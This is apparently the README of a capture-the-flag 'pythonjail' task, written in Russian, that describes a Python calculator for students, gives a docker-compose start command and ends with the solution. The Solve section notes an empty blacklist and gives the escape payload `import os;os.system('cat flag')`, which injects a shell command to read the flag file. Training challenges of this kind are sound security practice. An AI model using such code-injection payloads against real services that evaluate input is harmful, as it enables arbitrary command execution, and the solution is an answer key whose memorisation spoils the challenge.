# pythonjail

## Description

Чтобы облегчить жизнь студентам мы написали простой калькулятор на питоне.

Он гараздо функциональнее, чем кажется на первый взгляд

## Start

`docker-compose up -d --build --force-recreate`

## Solve

`blacklist=('')`

`import os;os.system('cat flag')`
